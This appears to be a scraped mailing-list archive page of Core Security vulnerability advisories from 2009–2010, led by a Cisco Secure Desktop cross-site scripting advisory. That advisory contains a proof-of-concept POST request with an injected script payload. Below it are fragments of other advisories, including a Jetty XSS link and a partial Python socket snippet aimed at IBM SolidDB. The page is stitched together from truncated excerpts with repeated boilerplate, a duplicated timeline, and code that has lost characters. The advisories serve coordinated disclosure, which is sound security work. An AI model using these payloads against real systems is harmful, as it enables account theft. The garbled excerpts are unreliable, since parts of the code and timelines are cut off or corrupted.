Title: Cisco Secure Desktop XSS/JavaScript Injection
Advisory Id: CORE-2010-0106
Advisory URL: http://www.coresecurity.com/content/cisco-secure-desktop-xss
Date published: 2010-02-01
Date of last update: 2010-02-01
Vendors contacted: Cisco
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Cross site scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 37960
CVE Name: CVE-2010-0440
3. *Vulnerability Description*
The Cisco Secure Desktop web application does not sufficiently verify if
a well-formed request was provided by the user who submitted the POST
request, resulting in a cross-site scripting vulnerability.
In order to be able to sucessfully make the attack, the Secure Desktop
application on the Cisco Appliance must be turned on.
4. *Vulnerable packages*
. Cisco Secure Desktop 3.4.2048
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Cisco Secure Desktop 3.5.841
6. *Vendor Information, Solutions and Workarounds*
Cisco Security Alert:
http://tools.cisco.com/security/center/viewAlert.x?alertId=19843
7. *Credits*
This vulnerability was discovered and researched by Matias Pablo Brutti
from Core Security Technologies.
The publication of this advisory was coordinated by Jorge Lucangeli Obes
from Core Security Technologies Advisories Team.
8. *Technical Description / Proof of Concept Code*
Cross-site scripting (XSS) vulnerabilities allow an attacker to execute
arbitrary scripting code in the context of the user browser (in the
vulnerable application's domain). For example, an attacker could exploit
an XSS vulnerability to steal user cookies (and then impersonate the
legitimate user) or fake a page requesting information to the user
(i.e.: credentials). This vulnerability occurs when user-supplied data
is displayed without encoding.
The Cisco Secure Desktop web application does not sufficiently verify if
a well-formed request was provided by the user who submitted the POST
request. The cross-site scripting vulnerability was found in the
following file/url:
/-
https://{IP}//+CSCOT+/translation?textdomain=csdprefix=translang=en-us
- -/
Using the POST variable:
/-
Starting, please wait...scriptalert(1);/script
- -/
The content of the POST field is not being encoded at the time of using
them in HTML output, therefore allowing an attacker who controls their
content to insert JavaScript code. Furthermore, we could possibly inject
JavaScript code into the 'start.html' page because the content of the
previously mentioned POST is used in 'binary/mainv.js' as input for an
'eval()' function, hence allowing an attacker to inject any code without
restrictions which will be executed in the context of the 'eval()'
function:
/-
282http_request.open('POST', path, false);
283http_request.send(msgs);
284var trans = new Array();
285try {
286eval(http_request.responseText);
287} catch (e) {}
- -/
8.1. *Proof of Concept*
/-
REQUEST:
POST
https://{IP}/+CSCOT+/translation?textdomain=csdprefix=translang=en-us
HTTP/1.1
Host: {IP}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9)
Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://{IP}/CACHE/sdesktop/install/start.htm
Content-Type: application/xml; charset=UTF-8
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56
Starting, please wait...scriptalert(1);/script
RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Mon, 16 Nov 2009 14:14:07 GMT
Content-Length: 122
trans[Starting, please wait...\scriptalert(1);/script] =
Starting, please wait...\scriptalert(1);/script;
- -/
9. *Report Timeline*
. 2010-01-12:
Vendor contacted.
. 2010-01-12:
Cisco replies, saying that it will investigate the report.
. 2010-01-12:
Cisco tentatively acknowledges the February 5th release date.
. 2010-01-13:
Core replies, reassuring that the release date can be moved if Cisco
can't meet it.
. 2010-01-13:
Cisco updates, pointing to a beta version of Cisco Secure Desktop that
contains a fix for the vulnerability.
. 2010-01-13:
Cisco describes the fix and the non-vulnerable versions of the package.
. 2010-01-14:
Cisco confirms the February 5th release date.
. 2010-01-14:
Core acknowledges this release
[Full-disclosure] [CORE-2009-1126] Corel Paint Shop Pro Photo X2 FPX Heap Overflow
. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktnPikACgkQyNibggitWa2BxgCfYtSY/FIhVjOtPxriGUpmReS/ tdoAnA0zeotWIo3c7UkokdVq2UIi+4yk =Onam -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-1013: Multiple XSS and Injection Vulnerabilities in TestLink Test Management and Execution System
and fixing them. Core suggests that developers actually in charge of these issues are copied in the e-mail loop, or that access to internal issue-tracking tools be given to them to actively participate in the discussions and the patching process. . 2009-11-30: Martin Havlat asks for technical details needed by him to confirm some of these vulnerabilities. . 2009-12-01: Core replies with the technical details needed by Martin Havlat. . 2009-12-02: Martin Havlat sends a patched version of TestLink to Core asking for verification of fixes to some of the vulnerabilities reported in this advisory. . 2009-12-03: Core replies saying that the fixes proposed by Martin Havlat fail to patch those specific vulnerabilities. The bugs are further researched by Core and the advisory draft is modified to include a more detailed explanation of these bugs. This technical information is shared by Core with Martin Havlat and some insight into possible fixes is also given. . 2009-12-09: TestLink 1.8.5 is released. . 2009-12-09: Advisory CORE-2009-1013 is published. 10. *References* [1] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) [2] http://www.teamst.org/ [3] http://www.owasp.org/index.php/PHP_Top_5 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksgL9IACgkQyNibggitWa3csgCfdV5dyeDFf1r+/yNIO6PpDgvk LJgAoKTesYDuoe6SpJzMhPKujbi1Z0vV =H22d -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0911: DAZ Studio Arbitrary Command Execution
comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksYGpcACgkQyNibggitWa3lrwCeKY5DAHCr9PaZ1Dk6FqMcrbUx mR8AoK6zHf4Ns/xzngH5kT+f4MDwbUpF =l/I+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0908: Autodesk SoftImage Scene TOC Arbitrary Command Execution
of response from Autodesk, Core decides to publish the advisory CORE-2009-0908 as user release. 9. *References* [1] The authors participated in Core Bugweek 2009 as members of the team Gimbal Lock N Load. [2] http://usa.autodesk.com/adsk/servlet/pc/index?siteID=123112id=13571168 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksK5XkACgkQyNibggitWa0Y9gCfWWW7WNOXTqp8vLzSZaLPYXkr lioAoJBrvffk0he38J/wRbQ4jOrWOKXR =ce7Z -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0909: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN TPwAn1AMCamFLaX3gHyUys//tHcyhlvn =fPrL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0910: Autodesk Maya Script Nodes Arbitrary Command Execution
10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksK5eoACgkQyNibggitWa2e1gCeM9FzHnlmxrmA4dvfO8Dgp2Zm B3oAoKymyyouTh4rjoDIsHdhF/Ho50lQ =YfZn -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-1027: IBM SolidDB invalid error code vulnerability
= socket.socket (socket.AF_INET, socket.SOCK_STREAM) s.connect ((target_ip, 2315)) s.send(a) s.close() - -/ 9. *Report Timeline* . 2009-10-23: Core Security Technologies sends an email to IBM AIX Security team requesting a security point of contact to report security bugs in SolidDB and asks whether the report should be sent to SolidDB security instead. . 2009-10-27: IBM AIX Security replies indicating that they forwarded the request to SolidDB's development team. . 2009-10-27: SolidDB's QA Manager contacts Core acknowledging the request originally sent to AIX Security and indicating that although there isn't an established formal channel to report security bugs in SolidDB the report could be sent directly to him. . 2009-10-27: Core Security Technologies replies stating that a draft technical document describing the problem is being prepared and will be sent to SolidDB as soon as it is available. In the meantime, Core indicates that a third-party vendor may have already reported the problem and requests confirmation that said vendor recently reported a remote denial of service vulnerability in the database service. . 2009-11-10: Core sends the advisory with full technical details to SolidDB team and informs that its publication is set to December 7th, 2009, and that the date is subject to be changed if publication of patches is coordinated at agreed upon date between Core and IBM SolidDB. Core requests confirmation that a SolidDB OEM customer [2] has already reported the bug and received patches. . 2009-11-17: IBM SolidDB publishes patches to the vulnerable products. . 2009-11-18: Advisory CORE-2009-1027 published. 10. *References* [1] IBM SolidDB http://www-01.ibm.com/software/data/soliddb/ [2] HP Openview NNM 7.53 Invalid DB Error Code vulnerability http://www.coresecurity.com/content/openview_nnm_internaldb_dos 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksEO4YACgkQyNibggitWa1laACgik+qyd+ZQVgVPiERCKXVGCu/ kPgAoKAmw/r3PKYxfPb9Q2RC4Bzc8tbh =mnrD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0814: HP Openview NNM 7.53 Invalid DB Error Code vulnerability
Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF =cR49 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0922: Jetty Persistent XSS in Sample Cookies Application
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Jetty Persistent XSS in Sample Cookies Application
1. *Advisory Information*
Title: Jetty Persistent XSS in Sample Cookies Application
Advisory Id: CORE-2009-0922
Advisory URL: http://www.coresecurity.com/content/jetty-persistent-xss
Date published: 2009-10-06
Date of last update: 2009-10-06
Vendors contacted: Jetty Team
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Persistent Cross-site Scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: N/A
3. *Vulnerability Description*
Jetty [1] includes several sample web applications for the developer to
learn from. One of them sets cookies with user supplied data, and then
dumps them as html. This application does not filter the user supplied
data when outputting it to the visitor. This constitutes a persistent
XSS vulnerability [2].
This application accepts the cookie content as a GET parameter. This
allows an attacker to trick someone into clicking a handcrafted link
with malicious code as the cookie content, and thus executing that code
in a privileged domain, such as localhost, any domain in the intranet
zone, or a domain where another web application is running. For example,
the following link will result in JavaScript code being executed on the
localhost domain if the victim has deployed a default installation of
Jetty in his workstation:
http://localhost:8080/cookie/?Name=aaaValue=bbbscriptalert(1)/scriptbbbcccAge=.
4. *Vulnerable packages*
. Jetty 6.1.19
. Jetty 6.1.20
5. *Non-vulnerable packages*
. Jetty 6.1.21
. Jetty 7.0.0
6. *Vendor Information, Solutions and Workarounds*
A workaround is to disable this particular example on any running
instance of Jetty in a particular workstation. Examples should always be
disabled on production servers, as recommended by the software vendor.
7. *Credits*
This vulnerability was discovered by Aureliano Calvo from Core Security
Technologies during Bugweek 2009 [3].
8. *Technical Description / Proof of Concept Code*
The problem resides in the 'CookieDump.java' file from the examples.
/-
Cookie[] cookies = request.getCookies();
for (int i=0;cookies!=null icookies.length;i++)
{
out.println(b+cookies[i].getName()+/b=+cookies[i].getValue()+br/);
}
- -/
'cookies[i].getValue()' should be filtered to avoid malicious code from
being executed.
9. *Report Timeline*
. 2009-09-22:
Core Security Technologies contacts Jan Bartel and Greg Wilkins from
Webtide, notifying them of the existence of a XSS vulnerability in a
sample application. Core sends its PGP key and asks Jan for his, would
he like to keep future communications encrypted.
. 2009-09-23:
Greg Wilkins asks for technical information about the vulnerability in
plaintext. He also comments that some vulnerabilities have been fixed in
the 6.1.21 and 7.0 releases, and asks Core to verify if the reported
vulnerability has already been fixed in their repositories.
. 2009-09-23:
Technical details are sent by Core, specifying that the Persistent XSS
that was discovered has not been fixed in the repositories pointed to by
Greg. Core asks for a release date for the fixed version of Jetty in
order to release the advisory only when a fixed version is available.
. 2009-09-24:
Greg Wilkins acknowledges the vulnerability and confirms it will be
fixed on release 7.0.0, due the week of September 28th. A release date
for Jetty 6.1.22 is not yet scheduled. Greg mentions that the
recommended workaround for production servers is not to deploy the
example applications.
. 2009-09-28:
Core reminds Greg that a deadline for the release of this advisory has
been set to Monday October 5th.
. 2009-09-28:
Greg Wilkins agrees with the proposed publication date, since there is a
good workaround.
. 2009-10-06:
The advisory CORE-2009-0922 is published.
10. *References*
[1] http://jetty.mortbay.org/
[2] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
[3] The author participated in Core Bugweek 2009 as member of the team
Bugged Coffee.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security
[Full-disclosure] CORE-2009-0820 - Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
, including technical details of the vulnerability in an advisory draft. . 2009-08-21: Simon Kelley acknowledges the vulnerability and confirms to be working on a patch. He also informs that he is aware that most home router distributions have tftp turned off by default, and firewalled, and suggests this should be mentioned on the advisory. Simon also mentions that a NULL-pointer dereference bug has also been discovered on that code, and suggests merging both bugs in the same advisory. Monday 31/08 is accepted as a possible release date for this advisory, and help is offered in contacting package maintainers of dnsmasq for most operating systems. . 2009-08-21: Core changes the advisory draft to accommodate Simon's suggestions. About the NULL-pointer dereference, Core mentions the terms it thinks appropriate for the bug to be merged into this advisory, and details how this would affect the following procedures, such as asking for a CVE/Bugtraq ID. . 2009-08-23: Simon Kelley contacts Core back, saying that the terms for the null-pointer derrefence bug to be included in the advisory are ok. He also mentions that the finder of this bug prefers to remain uncredited in this advisory. Details are sent by him about the new bug so that the advisory draft can be updated to include it. . 2009-08-23: Core asks for proper CVE and Bugtraq ID numbers, specifying it believes each vulnerability reported in this advisory should be assigned its own. . 2009-08-23: Vincent Danen, from Red Hat's Security Response Team contacts Core in order to discuss both vulnerabilities by a secure communications channel, and offers its help in obtaining proper CVE numbers, specifying they also believe a separate number should be assigned to each vulnerability. . 2009-08-23: Core replies to Vincent Danen by sending its gpg key. Core also mentions separate CVE numbers have already been asked. . 2009-08-23: Core replies to Simon Kelley, including a new advisory draft with both bugs merged. . 2009-08-23: Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends them to Red Hat and Simon Kelley. . 2009-08-31: The advisory CORE-2009-0820 is published. 10. *References* [1] http://www.thekelleys.org.uk/dnsmasq/doc.html [2] http://www.isi.edu/in-notes/ien/ien133.txt [3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm wa3syAdyXlixVdQhdk5vcK0= =tfqM -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2009-0820: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
Security Technologies notifies Simon Kelley of the vulnerability, including technical details of the vulnerability in an advisory draft. . 2009-08-21: Simon Kelley acknowledges the vulnerability and confirms to be working on a patch. He also informs that he is aware that most home router distributions have tftp turned off by default, and firewalled, and suggests this should be mentioned on the advisory. Simon also mentions that a NULL-pointer dereference bug has also been discovered on that code, and suggests merging both bugs in the same advisory. Monday 31/08 is accepted as a possible release date for this advisory, and help is offered in contacting package maintainers of dnsmasq for most operating systems. . 2009-08-21: Core changes the advisory draft to accommodate Simon's suggestions. About the NULL-pointer dereference, Core mentions the terms it thinks appropriate for the bug to be merged into this advisory, and details how this would affect the following procedures, such as asking for a CVE/Bugtraq ID. . 2009-08-23: Simon Kelley contacts Core back, saying that the terms for the null-pointer derrefence bug to be included in the advisory are ok. He also mentions that the finder of this bug prefers to remain uncredited in this advisory. Details are sent by him about the new bug so that the advisory draft can be updated to include it. . 2009-08-23: Core asks for proper CVE and Bugtraq ID numbers, specifying it believes each vulnerability reported in this advisory should be assigned its own. . 2009-08-23: Vincent Danen, from Red Hat's Security Response Team contacts Core in order to discuss both vulnerabilities by a secure communications channel, and offers its help in obtaining proper CVE numbers, specifying they also believe a separate number should be assigned to each vulnerability. . 2009-08-23: Core replies to Vincent Danen by sending its gpg key. Core also mentions separate CVE numbers have already been asked. . 2009-08-23: Core replies to Simon Kelley, including a new advisory draft with both bugs merged. . 2009-08-23: Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends them to Red Hat and Simon Kelley. . 2009-08-31: The advisory CORE-2009-0820 is published. 10. *References* [1] http://www.thekelleys.org.uk/dnsmasq/doc.html [2] http://www.isi.edu/in-notes/ien/ien133.txt [3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, 